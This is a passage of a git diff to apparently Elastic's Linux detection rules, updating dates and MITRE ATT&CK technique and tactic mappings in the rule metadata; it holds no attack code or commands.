@@ -101,26 +101,39 @@ process where host.os.type == "linux" and event.type == "start" and
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1190"
 name = "Exploit Public-Facing Application"
 reference = "https://attack.mitre.org/techniques/T1190/"
 
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
 
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/lateral_movement_kubeconfig_file_activity.toml b/rules/linux/lateral_movement_kubeconfig_file_activity.toml
index 742506ac792..14e0cd4c88e 100644
--- a/rules/linux/lateral_movement_kubeconfig_file_activity.toml
+++ b/rules/linux/lateral_movement_kubeconfig_file_activity.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/05"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -151,12 +151,30 @@ reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/linux/lateral_movement_remote_file_creation_world_writeable_dir.toml b/rules/linux/lateral_movement_remote_file_creation_world_writeable_dir.toml
index c4ec5a4e372..2cf39df00da 100644
--- a/rules/linux/lateral_movement_remote_file_creation_world_writeable_dir.toml
+++ b/rules/linux/lateral_movement_remote_file_creation_world_writeable_dir.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/20"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -132,6 +132,18 @@ id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable", "host.id"]
diff --git a/rules/linux/lateral_movement_ssh_it_worm_download.toml b/rules/linux/lateral_movement_ssh_it_worm_download.toml
index d7738588cf4..f2ca0a1065a 100644
--- a/rules/linux/lateral_movement_ssh_it_worm_download.toml
+++ b/rules/linux/lateral_movement_ssh_it_worm_download.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/21"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -135,3 +135,16 @@ reference = "https://attack.mitre.org/techniques/T1563/001/"
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml
index 40cf153f80e..691a01df08b 100644
--- a/rules/linux/lateral_movement_telnet_network_activity_external.toml
+++ b/rules/linux/lateral_movement_telnet_network_activity_external.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/04/23"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -133,3 +133,16 @@ reference = "https://attack.mitre.org/techniques/T1021/"
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/lateral_movement_unusual_remote_file_creation.toml b/rules/linux/lateral_movement_unusual_remote_file_creation.toml
index 828592b0bde..12d810eed6d 100644
--- a/rules/linux/lateral_movement_unusual_remote_file_creation.toml
+++ b/rules/linux/lateral_movement_unusual_remote_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/20"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -140,6 +140,18 @@ id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable", "host.id"]
diff --git a/rules/linux/persistence_apt_package_manager_execution.toml b/rules/linux/persistence_apt_package_manager_execution.toml
index 121bf350707..4d1af08566d 100644
--- a/rules/linux/persistence_apt_package_manager_execution.toml
+++ b/rules/linux/persistence_apt_package_manager_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/02/01"
 integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -174,6 +174,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
 
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
diff --git a/rules/linux/persistence_apt_package_manager_file_creation.toml b/rules/linux/persistence_apt_package_manager_file_creation.toml
index 6fa37d13b3e..b7166410e58 100644
--- a/rules/linux/persistence_apt_package_manager_file_creation.toml
+++ b/rules/linux/persistence_apt_package_manager_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/03"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -175,3 +175,21 @@ framework = "MITRE ATT&CK"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.016"
+name = "Installer Packages"
+reference = "https://attack.mitre.org/techniques/T1546/016/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_apt_package_manager_netcon.toml b/rules/linux/persistence_apt_package_manager_netcon.toml
index 7e83bb830d6..b0287a10224 100644
--- a/rules/linux/persistence_apt_package_manager_netcon.toml
+++ b/rules/linux/persistence_apt_package_manager_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/02/01"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -156,3 +156,21 @@ framework = "MITRE ATT&CK"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml
index c0e77855ab2..40a96e3b011 100644
--- a/rules/linux/persistence_at_job_creation.toml
+++ b/rules/linux/persistence_at_job_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/31"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -133,39 +133,3 @@ reference = "https://attack.mitre.org/techniques/T1053/002/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1053"
-name = "Scheduled Task/Job"
-reference = "https://attack.mitre.org/techniques/T1053/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1053.002"
-name = "At"
-reference = "https://attack.mitre.org/techniques/T1053/002/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1053"
-name = "Scheduled Task/Job"
-reference = "https://attack.mitre.org/techniques/T1053/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1053.002"
-name = "At"
-reference = "https://attack.mitre.org/techniques/T1053/002/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml
index 291d6f8eaa7..7b91eeff00b 100644
--- a/rules/linux/persistence_boot_file_copy.toml
+++ b/rules/linux/persistence_boot_file_copy.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -162,11 +162,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_bpf_program_or_map_load.toml b/rules/linux/persistence_bpf_program_or_map_load.toml
index af4757fbc16..4255fc6e065 100644
--- a/rules/linux/persistence_bpf_program_or_map_load.toml
+++ b/rules/linux/persistence_bpf_program_or_map_load.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/20"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/02/20"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -118,3 +118,21 @@ reference = "https://attack.mitre.org/techniques/T1014/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.006"
+name = "Kernel Modules and Extensions"
+reference = "https://attack.mitre.org/techniques/T1547/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_chkconfig_service_add.toml b/rules/linux/persistence_chkconfig_service_add.toml
index 554ad767f59..a93f65fa8e3 100644
--- a/rules/linux/persistence_chkconfig_service_add.toml
+++ b/rules/linux/persistence_chkconfig_service_add.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/22"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [transform]
 [[transform.osquery]]
@@ -196,6 +196,11 @@ id = "T1037"
 name = "Boot or Logon Initialization Scripts"
 reference = "https://attack.mitre.org/techniques/T1037/"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
index 523302ed1a5..7ecaaef7e15 100644
--- a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
+++ b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [transform]
 [[transform.osquery]]
@@ -187,6 +187,11 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
 
+[[rule.threat.technique]]
+id = "T1554"
+name = "Compromise Host Software Binary"
+reference = "https://attack.mitre.org/techniques/T1554/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml
index 752d0925262..0ba8618d0a2 100644
--- a/rules/linux/persistence_cron_job_creation.toml
+++ b/rules/linux/persistence_cron_job_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [transform]
 [[transform.osquery]]
@@ -230,39 +230,3 @@ reference = "https://attack.mitre.org/techniques/T1053/003/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1053"
-name = "Scheduled Task/Job"
-reference = "https://attack.mitre.org/techniques/T1053/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1053.003"
-name = "Cron"
-reference = "https://attack.mitre.org/techniques/T1053/003/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1053"
-name = "Scheduled Task/Job"
-reference = "https://attack.mitre.org/techniques/T1053/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1053.003"
-name = "Cron"
-reference = "https://attack.mitre.org/techniques/T1053/003/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/persistence_dbus_service_creation.toml b/rules/linux/persistence_dbus_service_creation.toml
index 386571da585..379cc6b7a2a 100644
--- a/rules/linux/persistence_dbus_service_creation.toml
+++ b/rules/linux/persistence_dbus_service_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -138,6 +138,11 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
 
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
@@ -151,6 +156,11 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
 
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
diff --git a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml
index 6d9c71de08e..9d97b4d31db 100644
--- a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml
+++ b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/21"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -158,6 +158,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
 
+[[rule.threat.technique]]
+id = "T1559"
+name = "Inter-Process Communication"
+reference = "https://attack.mitre.org/techniques/T1559/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
diff --git a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml
index 10ca2105f97..ded6346ead2 100644
--- a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml
+++ b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/25"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -157,7 +157,35 @@ reference = "https://attack.mitre.org/tactics/TA0003/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.016"
+name = "Installer Packages"
+reference = "https://attack.mitre.org/techniques/T1546/016/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml
index 595ab2d545a..c82730e95f3 100644
--- a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml
+++ b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -141,6 +141,23 @@ id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.016"
+name = "Installer Packages"
+reference = "https://attack.mitre.org/techniques/T1546/016/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.executable"]
diff --git a/rules/linux/persistence_dpkg_unusual_execution.toml b/rules/linux/persistence_dpkg_unusual_execution.toml
index 73a6322b954..3ec87f425bb 100644
--- a/rules/linux/persistence_dpkg_unusual_execution.toml
+++ b/rules/linux/persistence_dpkg_unusual_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -102,6 +102,11 @@ process.group_leader.name != null and not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
@@ -112,11 +117,6 @@ id = "T1546.016"
 name = "Installer Packages"
 reference = "https://attack.mitre.org/techniques/T1546/016/"
 
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
@@ -141,6 +141,24 @@ name = "Compromise Software Supply Chain"
 reference = "https://attack.mitre.org/techniques/T1195/002/"
 [rule.threat.tactic]
-name = "Initial Access"
 id = "TA0001"
+name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.016"
+name = "Installer Packages"
+reference = "https://attack.mitre.org/techniques/T1546/016/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_dracut_module_creation.toml b/rules/linux/persistence_dracut_module_creation.toml
index 9427236d5fb..0df18519ede 100644
--- a/rules/linux/persistence_dracut_module_creation.toml
+++ b/rules/linux/persistence_dracut_module_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -164,6 +164,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1542"
+name = "Pre-OS Boot"
+reference = "https://attack.mitre.org/techniques/T1542/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/persistence_dynamic_linker_backup.toml b/rules/linux/persistence_dynamic_linker_backup.toml
index 2dcef6e4fb8..428803c32e8 100644
--- a/rules/linux/persistence_dynamic_linker_backup.toml
+++ b/rules/linux/persistence_dynamic_linker_backup.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/12"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/17"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -192,3 +192,21 @@ reference = "https://attack.mitre.org/techniques/T1574/006/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_git_hook_execution.toml b/rules/linux/persistence_git_hook_execution.toml
index 55473220b03..78539f29fe0 100644
--- a/rules/linux/persistence_git_hook_execution.toml
+++ b/rules/linux/persistence_git_hook_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/15"
 integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -114,6 +114,11 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
diff --git a/rules/linux/persistence_git_hook_file_creation.toml b/rules/linux/persistence_git_hook_file_creation.toml
index c5b9d78a19a..b7455b0cb8e 100644
--- a/rules/linux/persistence_git_hook_file_creation.toml
+++ b/rules/linux/persistence_git_hook_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/26"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -129,6 +129,11 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
diff --git a/rules/linux/persistence_git_hook_netcon.toml b/rules/linux/persistence_git_hook_netcon.toml
index 3c79ca6de78..358537f729e 100644
--- a/rules/linux/persistence_git_hook_netcon.toml
+++ b/rules/linux/persistence_git_hook_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/15"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -123,6 +123,11 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
@@ -158,3 +163,16 @@ framework = "MITRE ATT&CK"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/persistence_git_hook_process_execution.toml b/rules/linux/persistence_git_hook_process_execution.toml
index 2203dc37a30..3cb9ae2082d 100644
--- a/rules/linux/persistence_git_hook_process_execution.toml
+++ b/rules/linux/persistence_git_hook_process_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/26"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -132,6 +132,11 @@ id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
diff --git a/rules/linux/persistence_grub_configuration_creation.toml b/rules/linux/persistence_grub_configuration_creation.toml
index d3c5b78af10..f874a2566c6 100644
--- a/rules/linux/persistence_grub_configuration_creation.toml
+++ b/rules/linux/persistence_grub_configuration_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -143,3 +143,16 @@ reference = "https://attack.mitre.org/techniques/T1574/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
